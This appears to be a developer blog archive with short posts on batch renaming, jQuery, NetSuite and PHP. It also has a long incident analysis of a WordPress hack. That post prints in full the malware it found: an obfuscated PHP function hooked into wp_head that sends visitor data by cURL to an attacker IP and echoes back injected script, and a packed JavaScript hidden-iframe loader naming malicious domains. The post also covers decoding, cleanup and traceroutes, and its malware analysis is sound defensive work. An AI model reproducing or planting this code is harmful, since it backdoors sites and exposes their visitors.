Resources

Mass Renaming Files via Command Prompt

Dec 12, 2011
Programming, Windows
0

Source: http://superuser.com/questions/16007/how-can-i-mass-rename-files-from-the-command-line-or-using-a-3rd-party-tool Thanks to zdan of superuser.com tl;dr? Here’s the script: dir /B > fileList.txt for /f “tokens=1,2,3,4,5 delims=-” %i in (fileList.txt) DO ren “%i-%j-%k-%l-%m” “%i-flowers-%l-%m” rm fileList.txt Enjoy. Now for the curious, read on. 😀 What those commands do are as follows: Create a list of the files in your current folder as a text file. Loops through the list of files and renames them. Deletes the text file so you’re left with your deliciously renamed files en masse. Now, the way the loop works is really cool, and I mean REALLY cool. Here’s what happens: It loops through every line in the file we just created, passing it to the rename command. So then for every line, the rename command then “tokenizes” the line based on the delimiters, AKA separators. Renames the file based on these temporary tokens to the desired string of text and/or arrangement of tokens. So, now we can gather what info the script is using: Tokens: 5, %i, %j, %k, %l, %m Delimiters: – Current File Name Pattern: “%i-%j-%k-%l-%m” Desired File Name Pattern: “%i-flowers-%l-%m” Now we know, after that close look at what the command does, that the script is using 5 tokens, what their variables are, how it’s delimiting the file name, what the file name pattern currently is, and how it will be renamed. I told you it was neat. It certainly makes life easier when you’re handed a batch of files improperly renamed ever-so-slightly. 🙂 Enjoy.

Solution: jQuery .append() or .appendTo not working in IE8, IE7, or IE6

Dec 12, 2011
Javascript
5

The solution to this is more of a warning: when you create elements in the DOM, if they are not closed, IE8, IE7 and IE6 will not allow any modification to that element, including .append() and .appendTo() because they are not considered standard or correct DOM elements, and hence are treated as text. Make sure that you close your elements such as <div></div><a></a>, etc. so the older browsers can tell what you are trying to do. All modern browsers including IE 9, will still append to the non closed element if you decide not to close them, at least in my experience this occurs with <a >records but I have not tested with others.

Add Matrix Items, Options and Pricing to your Netsuite Website / Webstore

Nov 11, 2011
Netsuite
3

This is a Step by Step How to Add a Matrix Item in Netsuite PRELIMINARY Firstly you need to make sure you are using the following tag in your HTML Item Template for Item Drilldowns to display your checkout options. <%=getCurrentAttribute(“item”, “salesPriceHTML”)%> which gives you a dynamically changing price. <%=getCurrentAttribute(“item”, “addToCartHTML”)%> which gives you your option menus, delivery date and submit button. Make sure to wrap a table around this one if you are trying to style it somewhere else besides its own row. For example: <div id=”drilldown-add”> <table> <tr> <td> <%=getCurrentAttribute(“item”, “addToCartHTML”)%> </td> </tr> </table> </div> STEP BY STEP Create or Edit a Custom List Setup -> Customize -> List -> Select/Add Option Value -> Add Values Show options in -> Choose Matrix Option List -> Checked Create or Edit a Custom Item Field Setup -> Customize -> Custom Item Fields -> Select/Add Option-> Check Item Types Matrix Option -> Check Type -> Multiple Select List/Record -> List Chosen Store Value -> Checked Create or Edit a Transaction Item Option Setup -> Customize -> Transaction Item Options -> Select Option/Add -> Check “Web Store” If the Option is to be Included but not seen, check Hidden. Sourcing & Filtering -> Source List -> “Item” Sourcing & Filtering -> Source From-> Item Field Chosen Create or Edit a Matrix Item Lists -> Websites -> Select / Add Item Use the Matrix Wizard to Create a Matrix. Custom Tab -> Item Options -> IMPORTANT: CHOOSE The Item Option that Corresponds to the Matrix Chosen! That very last step is not so intuitive, because normally you would use that to select regular item options that have no bearing on price. You need to hold ctrl and click on the Matrix Option plus whatever other options you need. Hopefully this can be of help to you!

The Internet Progresses: Adobe Flash Discontinued

Nov 11, 2011
HTML
1

Flash was a language written to display dynamic content and enhance the look and feel of web pages. There are many things that Flash did that couldn’t be done by most browsers during its era. The problem with Flash is that every browser built had to include, or at least support a plugin version of flash, to display the content. Flash constantly gets updated so there have always been many issues with it. There was a disconnect between Flash and the Browser, it was just something else that needed to be maintained. This issue happened with Java and Javascript. Javascript replaced Java not because it was “better” but because it was lightweight and able ot be built into the browser. Java’s Javascript is HTML 5. The difference is HTML5 is lighter, better, and promotes new and cleaner standards without the need to update an app, as it is built into your browser. With the dawn of mobile computing, flash has been a struggle. Most mobile browsers didnt support flash natively, and Adobe wasn’t ready to have flash installed in a non PC/Max/Linux environment such as iOS (iPhone, iPad). Porting it to Android wasn’t as big of a problem because it uses a near-true linux kernel. So Adobe is killing flash, and I say, for the better. HTML 5 is quickly becoming the standard that all browsers can follow, and allows different content to be displayed based on what browser the user is using. The biggest holdback has been browsers such as IE 6, 7, and 8, which have no HTML5 compatibility. A large part of the world still uses these browsers but it is losing hold. Most people who use them are either locked down by their operating system or don’t know what a browser really is (Sound Familiar? “I use Windows as my Browser!”). I think that Microsoft killing off Windows XP, and requiring Windows 7 to use IE9 has helped in this decision. Forcing users to use a modern browser is a must for progress. Not only is there rich dynamic and beautiful content out there to be had with modern browsers, but there is security too. Internet Explorer has been the defacto browser for many corporations because it gave direct access to the OS through the browser. As nice as that is, in a stacked environment like Microsoft Windows, it becomes the number one problem with using IE as your browser, you open up the guts of your PC to the rest of the world, whereas Browser like FireFox and Chrome do not. Farewell Adobe Flash, it was nice knowing you. I am excited to see all the web tech that will start to be created in HTML5. Oh…and worried all your Flash Content is all for not? Guess What ? Google provides a free bit of code that you can run in your browser to convert (most of) your SWF (Flash) files into HTML 5!! Here is the link to this sweet project: http://www.google.com/doubleclick/studio/swiffy/ Out with the old, in with the New! Thats how it works with Tech!

How to Connect Website Badge / Link to Google+ Business Page

Nov 11, 2011
CSS, HTML, Social Media - SMO
0

For those of you who skipped configuring your badge for Google+ Pages and can’t find the option anymore, use the following link: https://developers.google.com/+/plugins/badge/config Type in your page’s ID and you will be able to create it again. You can see it live here at esotech.org at the footer and also the breadcrumb on inner pages. You will have to add a bit of code to your header, and then use the link wherever you like. The link seems highly customizable if you know what you are doing. For example, setting height and width of the icon shouldn’t be a problem. Here is a code snippet example for Esotech’s Page. <!– Place this tag in the <head> of your document–> <link href=”https://plus.google.com/103467698593383507666/” rel=”publisher” /> <!– Place this tag where you want the badge to render–> <a href=”https://plus.google.com/103467698593383507666/?prsrc=3″ style=”text-decoration: none;”> <img src=”https://ssl.gstatic.com/images/icons/gplus-64.png” width=”64″ height=”64″ style=”border: 0;”> </img> </a>

Solution: Using Include or Require in PHP but Can’t Find File

Oct 10, 2011
PHP
1

The situation is you are trying to use include or require to load a file from a folder in your site, when the file you are calling include or require from is inside a different folder in the site and NOT the document root. The issue is, when you use include outside of your document root, it considers that folder as the document root, so you are forced to give it the real root directory of your website on the server. Your File: website.com/directory/script.php Your Code in that file: require_once( “/directory2/filename.php”); or include_once( “/directory2/filename.php”); If properly configured, you can use this PHP Server Key/Variable. $_SERVER[“DOCUMENT_ROOT”] So a good Example would be the following: include_once( $_SERVER[“DOCUMENT_ROOT”] . “/directory2/filename.php”); or include_once( $_SERVER[“DOCUMENT_ROOT”] . “/directory2/filename.php”); In the case that directory is the folder just after the root of your site.

Oct 10, 2011
Netsuite
0

Netsuite Search is essential for your shoppers to find what they are looking for. However, running a Netsuite eCommerce site, you really don’t need to show your clients your content in search results, when most of the time they will be looking for items. It is easy to remove your content and categories (including tabs) from search results: Under Setup on the Menu Bar Highlight Website Then Highlight Setup Website Choose your Website / Webstore This will guide you to your main Website setup screen, we still have a little more navigation to do. Go to the “Search Section” Go to the “Global Search” Section Uncheck Include Categories Uncheck Include Information Items Pretty easy right? Happy searching!

Oct 10, 2011
Netsuite
0

Every website in Netsuite has the option on Checkout to choose between being Invoiced or going straight to a Sales order form that supports Credit Cards or ACH. Most of the time you will not want Invoicing enabled because it is an inefficient way of dealing with online sales. It is pretty easy to disable the invoicing feature but it’s somewhat buried, as are most Netsuite settings.. Under Setup on the Menu Bar Highlight Website Then Highlight Setup Website Choose your Website / Webstore This will give guide you to your main Website setup screen, we still have a little more navigation to do. Go to the “Shopping Section” Go to the “Checkout Preferences” Section Find the Sales Order Type option Here you will be able ot choose a static Sales ORder type from your Sales Order types, setup elsewher ein Netsuite, or you can choose “Per Customer Basis”. Per customer basis opens up the Credit Card Form and Invoice Form field, allowing you to set different ones for each. Notice that this will open a radio menu in your Netsuite customer checkout allowing for Invoicing. That’s it!

Oct 10, 2011
Technology, Wordpress
37

While working on a development site, that sat idle before any actual work was done for a while, we noticed that some kind of iframe injection had occured. There was no trace of it in the database or the server code, nothing that said iFrame, nothing that added extra scripts. This was a brand new website, template from scratch with no plugins and no content…I Was pulling my hair out, but slowly started getting on to the situation, and with the help of Mike Brich from HavenLight Software, got right down to it after hours of investigation and head scratching. This post will be very code intensive, but with full explanations, just a warning, I am jumping right into it!! Overview Bottom line this is how it works: Something Injects Code into wp-settings.php function counter_wordpress is decoded and sends a CURL request to a third party server with your computer info. CURL sends a string from third party server and injects javascript javascript communicates with yet another server and injects an iframe iFrame injects all sorts of other scripts, popups, java programs, and other iFrames from other servers. CURL’d server logs your IP and computer information, and the next time you visit hides itself, or prevents itself from showing its payload, for a while. Repeat. Jump to Solution Jump to Analysis Jump to Questions The Problem The iFrame injection did not appear on my browsers, or any other browser in my office. It seemed to appear only on browsers coming from a IP that hadn’t encountered it before, or at least hadn’t for a while. On success or failure of delivering its payload, it hid! Not only from machines, but from Bots too, Googlebot and Googles malware scans saw nothing coming from this site, it was bizarre. I scanned the source code of the entire wordpress install for any traces of traditional injections or Iframes, but there were none. There was nothing in the database either. I disabled and removed all plugins, and it was still there. The behavior of the code was strange also, it would load the script, show a Java wants to run warning, then on refresh start loading data from various sources as the iFrame was inserted, I found out later that the script had a 5 second delay when loading the iFrame, which didn’t allow me to catch it as I was refreshing, and also, I am sure, helps avoiding automated scans, including Google’s Malware scans. After loading once it would disappear, never to return. I couldn’t see it, however something interesting started to happen. Refreshing the page over and over in the source code, shows an error that appeared on the site and showed up in the source code where the original Injection occured, right before the end of </head> <html> <head> <title>The page is temporarily unavailable</title> <style> body { font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body bgcolor=”white” text=”black”> <table width=”100%” height=”100%”> <tr> <td align=”center” valign=”middle”> The page you are looking for is temporarily unavailable.<br/> Please try again later. </td> </tr> </table> </body> </html> This made it seem as if another website was loading inside mine, since the opening and closing html tags were a dead giveaway. I started to search for this issue and pretty quickly found out that this was an error message from a web server running nginx, an open-source, high-performance HTTP server and reverse proxy, as well as an IMAP/POP3 proxy server meant for servers with limited system resources. The server was errorign out, perhaps too many sites are connected at once and its DoSing itself. So, confirmed, my website is loading another website in its header. This is the code that was being used, please be careful and do not click on any links in this document that are in code blocks. <script type=’text/javascript’>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘d 9(){5=2.e(\’7\’);f(!5){8 0=2.c(\’3\’);2.g.h(0);0.6=\’7\’;0.1.a=\’4\’;0.1.b=\’4\’;0.1.n=\’i\’;0.r=\’s://q.o.j/3.k?6=l\’}}8 t=m(“9()”,p);’,30,30,’el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|345|500|sokistatehouse|src|http|’.split(‘|’),0,{})) </script> <IFRAME style=”display:none” SRC=”http://finderonlinesearch.com/tds/in.cgi?5&user=mexx” WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME><meta name=”Cart66Version” content=”Professional 1.2.2″ /> </head> It is messy code, difficult to understand with the naked eye, why? Because, as Mike found out, its packed. Here is what it looks like unpacked. function MakeFrameEx() { element = document.getElementById(‘yahoo_api’); if (!element) { var el = document.createElement(‘iframe’); document.body.appendChild(el); el.id = ‘yahoo_api’; el.style.width = ‘1px’; el.style.height = ‘1px’; el.style.display = ‘none’; el.src = ‘http://hardpancakes.xe.cx/showthread.php?t=72291731′ } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf(“msie”) != -1 && ua.indexOf(“opera”) == -1 && ua.indexOf(“webtv”) == -1)) && ua.indexOf(“windows”) != -1) { var t = setTimeout(“MakeFrameEx()”, 500) } Interesting URL! Where does it go? Interestingly enough to a 404 page on a nginx server, as suspected. So where is the iFrame, and where the hell is this packed javascript function getting loaded into the header? Now I go back to my searches, I can’t find any mention of the iFrame URL the new unencoded URL, or even “MakeFrameEx” anywhere in the source code. so I decided to search again for anything with the words wp_head, which can be done like this: # grep -Rin ‘wp_head’ yourdirectory I look again at the function “counter_wordpress” that I had overlooked as a valid system file, that just looked overly complex (I thought it was part of wordpress.com’s tracker). It wasn’t. This is the function that was sitting right above do_action(‘init’) in wp-settings.php: function counter_wordpress() {$_F=__FILE__;$_X=’Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+’;eval(base64_decode(‘JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’));$ua = urlencode(strtolower($_SERVER[‘HTTP_USER_AGENT’]));$ip = $_SERVER[‘REMOTE_ADDR’];$host = $_SERVER[‘HTTP_HOST’];$uri = urlencode($_SERVER[‘REQUEST_URI’]);$ref = urlencode($_SERVER[‘HTTP_REFERER’]);$url = $url.’?ip=’.$ip.’&host=’.$host.’&uri=’.$uri.’&ua=’.$ua.’&ref=’.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action(‘wp_head’, ‘counter_wordpress’); There it is, a ridiculously over encoded piece of code that gets injected into wp_head. I am going to move onto the solution now, and then go back to analyze this bit of code, and pose some questions because I still can’t answer precisely on how it got in there in the first place. The Solution Firstly, go to your main wordpress directory and type: # ls -al Take note of any files that have changed recently versus others, most of your wordpress config files should have the same modified date, except maybe wp-config.php wp-settings.php is the file I found infected, but you may find it elsewhere. Remove the function counter_wordpress() including the it’s wordpress hook add_action(‘wp_head’, ‘counter_wordpress’); If you do not have this function in your wp-settings, it may show up somewhere else but you can be sure that it will be followed by an add_action(‘wp_head’, ‘function_name’); that is not supposed to be there. Find it and remove it immediatly. If you cannot find the code in the wp-settings.php file I suggest running the following command: # grep -Rin ‘wp_head’ yourdirectory Where yourdirectory is the directory in question, this will give you a list of files, line numbers, and code where wp_head exists in your install, which is a requirement for the code to install itself…(imagine if they had encrypted THAT and evaled it, would be impossible to find.) After removing this function you should find that your error message, Injected Javascript and Injected iFrames all stop loading. After you remove the function check your permissions in your wordpress root directory and all other directories, make sure they are set to 755 or even more stringent, mine was not and I suspect that there is some other WordPress vulnerability that took advantage of that, of which I cannot identify. The Analysis Lets dig deeper, how does this thing work? It is encrypted after all… Here is the PHP function, a bit more legible: function counter_wordpress() { $_F=__FILE__; $_X=’Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+’; eval(base64_decode(‘JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’)); $ua = urlencode(strtolower($_SERVER[‘HTTP_USER_AGENT’])); $ip = $_SERVER[‘REMOTE_ADDR’]; $host = $_SERVER[‘HTTP_HOST’]; $uri = urlencode($_SERVER[‘REQUEST_URI’]); $ref = urlencode($_SERVER[‘HTTP_REFERER’]); $url = $url.’?ip=’.$ip.’&host=’.$host.’&uri=’.$uri.’&ua=’.$ua.’&ref=’.$ref; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 2); $re = curl_exec($ch); curl_close($ch); echo $re; } add_action(‘wp_head’, ‘counter_wordpress’); As we can see, this is a average CURL operation, but to where is it sending? We have all the params but the URL, which is concatenated from…somewhere… Actually it has alot to do with that variable $_X which is encoded about 3 or 4 times, as you will see: Evaluation Process This is the process of evaluation: $_X = an Encoded String Another String is Decoded which accepts $_X Inside that code is another Encoded form of $_X Inside that same Code, the new decoded form of $_X is run through strtr function, which replaced letters and numbers with other letters and numbers. Inside taht same code $_R is set and ereg _replace ran through $_R with $_X Inside that same code, $_R is evaluated Inside that same code $_R and $_X are set to null so you cant echo them outside of the encoding. Then the entire thing is evaluated, giving you $url Evaluation Breakdown Lets break it down: $_F=__FILE__; Encryption Layer 1: $_X=’Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+’; eval(base64_decode(‘JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’)); Encryption Layer 2: $_X=base64_decode($_X);$_X=strtr($_X,’123456aouie’,’aouie123456′);$_R=ereg_replace(‘__FILE__’,”‘”.$_F.”‘”,$_X);eval($_R);$_R=0;$_X=0; Encryption Layer 3: $_X=base64_decode($_X); Result: ?><?php $3rl = ‘http://96.69e.a6e.o0/bt.php’; ?> Encryption Layer 4: $_X=strtr($_X,’123456aouie’,’aouie123456′); Result: ?><?php $url = ‘http://91.196.216.30/bt.php’; ?> Encryption Layer 5: $_R=ereg_replace(‘__FILE__’,”‘”.$_F.”‘”,$_X); Result: ?><?php $url = ‘http://91.196.216.30/bt.php’; ?> Evaluate Command: eval($_R); Result: ?><?php $url = ‘http://91.196.216.30/bt.php’; ?> $_R=0;$_X=0; Set these to 0 so you can’t echo them without recreating the encryption process step by step. Final Result of Encryption: $url = ‘http://91.196.216.30/bt.php’; $ua = urlencode(strtolower($_SERVER[‘HTTP_USER_AGENT’])); $ip = $_SERVER[‘REMOTE_ADDR’]; $host = $_SERVER[‘HTTP_HOST’]; $uri = urlencode($_SERVER[‘REQUEST_URI’]); $ref = urlencode($_SERVER[‘HTTP_REFERER’]); $url = $url.’?ip=’.$ip.’&host=’.$host.’&uri=’.$uri.’&ua=’.$ua.’&ref=’.$ref; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 2); $re = curl_exec($ch); curl_close($ch); echo $re; } Complex! This is an enourmous amount of work to encrypt and throw off an investigator trying to figure out what happened to their site. It is an amazing level of complexity, kudos to the designer! This will make sure that you cannot search for ANY of the words, URL’s or text in your wordpress files or databases, there is no algorithm to do a search for something of this complexity, it was hard enough to break it down! All of this encoding to hide the URL: http://91.196.216.30/bt.php. The end result is that the script sends this data to the server, with all parameters, and echos whatever the server decides to spit back, in my case, it was the compressed javascript code, shown here uncompressed again for convenience: function MakeFrameEx() { element = document.getElementById(‘yahoo_api’); if (!element) { var el = document.createElement(‘iframe’); document.body.appendChild(el); el.id = ‘yahoo_api’; el.style.width = ‘1px’; el.style.height = ‘1px’; el.style.display = ‘none’; el.src = ‘http://hardpancakes.xe.cx/showthread.php?t=72291731′ } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf(“msie”) != -1 && ua.indexOf(“opera”) == -1 && ua.indexOf(“webtv”) == -1)) && ua.indexOf(“windows”) != -1) { var t = setTimeout(“MakeFrameEx()”, 500) } This code does a strange check to see if the user agent is internet explorer, opera, webtv or windows and if it is, or isnt, sets a timeout to make a iFrame with the previous code. This delay is perfect for stopping detection from bots, crawlers, and some passers by. It causes confusion when troubleshooting it as well. The interesting thing about this malicious code is that it uses well known names, such as yahoo_api to create a new element. This bit of code contacts a website known as hardpankaces.xe.cx, which then delivers its payload by opening up an iFrame to http://finderonlinesearch.com/tds/in.cgi?5&user=mexx. Note that the website in the iFrame was different earlier while troubleshooting, than it was shown, but the user always =mexx, whcih I found odd. I found the javascript snippet on Pastebin of all places, posted by a guest with no comments. I was interested, where the hell are these domains going, and where is the IP Address located for the originating server that initializes the script? Frankfurt, Germany And Moscow, Russia. Here are the tracert logs and whois records, you can form opinions yourselves: Tracert – Script Originating IP: Tracing route to 91.196.216.30 over a maximum of 30 hops 4 * * 23 ms 99.167.141.18 5 21 ms 20 ms 20 ms 12.83.70.9 6 22 ms 22 ms 22 ms fldfl01jt.ip.att.net [12.122.81.25] 7 30 ms 23 ms 23 ms 192.205.36.254 8 45 ms 36 ms 36 ms ae-32-52.ebr2.Miami1.Level3.net [4.69.138.126] 9 53 ms 47 ms 53 ms ae-2-2.ebr2.Atlanta2.Level3.net [4.69.140.142] 10 47 ms 47 ms 53 ms ae-73-73.ebr3.Atlanta2.Level3.net [4.69.148.253] 11 65 ms 69 ms 69 ms ae-2-2.ebr1.Washington1.Level3.net [4.69.132.86] 12 74 ms 74 ms 74 ms ae-91-91.csw4.Washington1.Level3.net [4.69.134.1 42] 13 64 ms 70 ms 64 ms ae-92-92.ebr2.Washington1.Level3.net [4.69.134.1 57] 14 149 ms 143 ms 150 ms ae-43-43.ebr2.Paris1.Level3.net [4.69.137.57] 15 148 ms 154 ms 154 ms ae-46-46.ebr1.Frankfurt1.Level3.net [4.69.143.13 7] 16 148 ms 154 ms 148 ms ae-61-61.csw1.Frankfurt1.Level3.net [4.69.140.2] 17 148 ms 154 ms 147 ms ae-1-60.edge3.Frankfurt1.Level3.net [4.69.154.7] 18 155 ms 155 ms 158 ms IPTRIPLEPLA.edge3.Frankfurt1.Level3.net [212.162 .40.194] 19 358 ms 197 ms 192 ms te7-2-pontiac.stk.citytelecom.ru [217.65.1.229] 20 186 ms 180 ms 186 ms te4-4-adelaida.spb.citytelecom.ru [217.65.1.201] 21 187 ms 178 ms 185 ms 62.152.42.134 22 215 ms 214 ms 220 ms 91.196.216.30 Whois – Script Originating IP: inetnum: 91.196.216.0 – 91.196.219.255 netname: SPETSENERGO-NET descr: SpetsEnergo Ltd. country: RU org: ORG-SL138-RIPE admin-c: KDS23-RIPE tech-c: KDS23-RIPE remarks: SPAM issues: [email protected] remarks: Network security issues: [email protected] remarks: General and other information: [email protected] status: ASSIGNED PI mnt-by: RIPE-NCC-END-MNT mnt-by: MNT-SPETSENERGO mnt-lower: RIPE-NCC-END-MNT mnt-routes: MNT-SPETSENERGO mnt-domains: MNT-SPETSENERGO source: RIPE #Filtered organisation: ORG-SL138-RIPE org-name: SpetsEnergo Ltd. tech-c: KDS23-RIPE admin-c: KDS23-RIPE remarks: SPAM issues: [email protected] remarks: Network security issues: [email protected] remarks: General and other information: [email protected] org-type: OTHER address: Russia, 127422, Moscow, Timiryazevskaya st, 11 mnt-ref: MNT-SPETSENERGO mnt-by: MNT-SPETSENERGO source: RIPE #Filtered person: Kruchkov Dmitry Sergeevich address: Russia, 127422, Moscow, Timiryazevskaya st, 11 abuse-mailbox: [email protected] phone: +7 916 959 2268 nic-hdl: KDS23-RIPE source: RIPE #Filtered route: 91.196.216.0/22 descr: SPETSENERGO origin: AS43239 mnt-by: MNT-SPETSENERGO source: RIPE #Filtered Tracert: http://hardpancakes.xe.cx/showthread.php?t=7229173 (46.4.108.18) 5 21 ms 21 ms 20 ms 12.83.70.9 6 44 ms 23 ms 22 ms fldfl01jt.ip.att.net [12.122.81.25] 7 30 ms 29 ms 23 ms 192.205.36.254 8 36 ms 35 ms 35 ms ae-32-52.ebr2.Miami1.Level3.net [4.69.138.126] 9 43 ms 36 ms 42 ms ae-2-2.ebr2.Atlanta2.Level3.net [4.69.140.142] 10 42 ms 38 ms 43 ms ae-73-73.ebr3.Atlanta2.Level3.net [4.69.148.253] 11 54 ms 53 ms 60 ms ae-2-2.ebr1.Washington1.Level3.net [4.69.132.86] 12 53 ms 58 ms 59 ms ae-81-81.csw3.Washington1.Level3.net [4.69.134.1 38] 13 57 ms 59 ms 53 ms ae-82-82.ebr2.Washington1.Level3.net [4.69.134.1 53] 14 146 ms 134 ms 140 ms ae-44-44.ebr2.Paris1.Level3.net [4.69.137.61] 15 139 ms 138 ms 146 ms ae-48-48.ebr1.Frankfurt1.Level3.net [4.69.143.14 5] 16 139 ms 144 ms 144 ms ae-81-81.csw3.Frankfurt1.Level3.net [4.69.140.10 ] 17 139 ms 144 ms 138 ms ae-3-80.edge3.Frankfurt1.Level3.net [4.69.154.13 5] 18 139 ms 145 ms 180 ms HETZNER-ONL.edge3.Frankfurt1.Level3.net [212.162 .40.206] 19 157 ms 158 ms 149 ms hos-bb1.juniper1.fs.hetzner.de [213.239.240.242] 20 153 ms 144 ms 144 ms hos-tr1.ex3k10.rz14.hetzner.de [213.239.224.139] 21 150 ms 144 ms 150 ms static.18.108.4.46.clients.your-server.de [46.4. 108.18] Trace complete. Whois: http://hardpancakes.xe.cx/showthread.php?t=7229173 (46.4.108.18) inetnum: 46.4.108.0 – 46.4.108.31 netname: HETZNER-RZ14 descr: Hetzner Online AG descr: Datacenter 14 country: DE admin-c: HOAC1-RIPE tech-c: HOAC1-RIPE status: ASSIGNED PA mnt-by: HOS-GUN mnt-lower: HOS-GUN mnt-routes: HOS-GUN source: RIPE #Filtered role: Hetzner Online AG – Contact Role address: Hetzner Online AG address: Stuttgarter Stra?e 1 address: D-91710 Gunzenhausen address: Germany phone: +49 9831 61 00 61 fax-no: +49 9831 61 00 62 abuse-mailbox: [email protected] remarks: ************************************************* remarks: * For spam/abuse/security issues please contact * remarks: * [email protected] , not this address * remarks: ************************************************* remarks: remarks: ************************************************* remarks: * Any questions on Peering please send to * remarks: * [email protected] * remarks: ************************************************* org: ORG-HOA1-RIPE admin-c: MH375-RIPE tech-c: GM834-RIPE tech-c: RB1502-RIPE tech-c: SK2374-RIPE tech-c: ND762-RIPE tech-c: TF2013-RIPE tech-c: MF1400-RIPE nic-hdl: HOAC1-RIPE mnt-by: HOS-GUN source: RIPE #Filtered route: 46.4.0.0/16 descr: HETZNER-RZ-FKS-BLK3 origin: AS24940 org: ORG-HOA1-RIPE mnt-by: HOS-GUN source: RIPE #Filtered Update Delete organisation: ORG-HOA1-RIPE org-name: Hetzner Online AG org-type: LIR address: Hetzner Online AG Attn. Martin Hetzner Stuttgarter Str. 1 91710 Gunzenhausen GERMANY phone: +49 9831 610061 fax-no: +49 9831 610062 admin-c: DM93-RIPE admin-c: GM834-RIPE admin-c: HOAC1-RIPE admin-c: MH375-RIPE admin-c: RB1502-RIPE admin-c: SK2374-RIPE admin-c: TF2013-RIPE admin-c: MF1400-RIPE mnt-ref: HOS-GUN mnt-ref: RIPE-NCC-HM-MNT mnt-by: RIPE-NCC-HM-MNT source: RIPE #Filtered Tracert: http://finderonlinesearch.com/tds/in.cgi?5&user=mexx (78.159.112.180) 5 21 ms 21 ms 22 ms 12.83.70.9 6 22 ms 22 ms 21 ms fldfl01jt.ip.att.net [12.122.81.25] 7 29 ms 27 ms 29 ms 192.205.36.254 8 24 ms 23 ms 29 ms 4.69.138.91 9 64 ms 71 ms 70 ms ae-2-2.ebr1.Dallas1.Level3.net [4.69.140.133] 10 64 ms 70 ms 64 ms ae-91-91.csw4.Dallas1.Level3.net [4.69.151.161] 11 66 ms 71 ms 64 ms ae-93-93.ebr3.Dallas1.Level3.net [4.69.151.170] 12 71 ms 70 ms 64 ms ae-7-7.ebr3.Atlanta2.Level3.net [4.69.134.22] 13 87 ms 80 ms 86 ms ae-2-2.ebr1.Washington1.Level3.net [4.69.132.86] 14 83 ms 87 ms 80 ms ae-81-81.csw3.Washington1.Level3.net [4.69.134.1 38] 15 81 ms 87 ms 81 ms ae-82-82.ebr2.Washington1.Level3.net [4.69.134.1 53] 16 168 ms 167 ms 161 ms ae-41-41.ebr2.Paris1.Level3.net [4.69.137.49] 17 172 ms 166 ms 166 ms ae-48-48.ebr1.Frankfurt1.Level3.net [4.69.143.14 5] 18 172 ms 167 ms 172 ms ae-61-61.csw1.Frankfurt1.Level3.net [4.69.140.2] 19 167 ms 183 ms 167 ms ae-1-60.edge4.Frankfurt1.Level3.net [4.69.154.8] 20 295 ms 203 ms 199 ms 212.162.5.234 21 182 ms 177 ms 176 ms 89-149-218-34.internetserviceteam.com [89.149.21 8.34] 22 183 ms 180 ms 182 ms 89-149-218-178.gatewayrouter.net [89.149.218.178 ] 23 183 ms 175 ms 182 ms 78.159.112.180 Trace complete. Whois: http://finderonlinesearch.com/tds/in.cgi?5&user=mexx (78.159.112.180) inetnum: 78.159.112.0 – 78.159.115.255 netname: NETDIRECT-NET descr: Leaseweb Germany GmbH (previously netdirekt e. K.) remarks: INFRA-AW country: DE admin-c: WW200-RIPE tech-c: SR614-RIPE status: ASSIGNED PA mnt-by: NETDIRECT-MNT mnt-lower: NETDIRECT-MNT mnt-routes: NETDIRECT-MNT source: RIPE #Filtered person: Wiethold Wagner address: Leaseweb Germany GmbH (previously netdirekt e. K.) address: Kleyer Strasse 79 / Tor 14 address: 60326 Frankfurt address: DE phone: +49 69 90556880 fax-no: +49 69 905568822 abuse-mailbox: [email protected] nic-hdl: WW200-RIPE mnt-by: NETDIRECT-MNT source: RIPE #Filtered person: Simon Roehl address: Leaseweb Germany GmbH (previously netdirekt e. K.) address: Kleyer Strasse 79 /Tor 14 address: 60326 Frankfurt address: DE phone: +49 69 90556880 fax-no: +49 69 905568822 abuse-mailbox: [email protected] nic-hdl: SR614-RIPE mnt-by: NETDIRECT-MNT source: RIPE 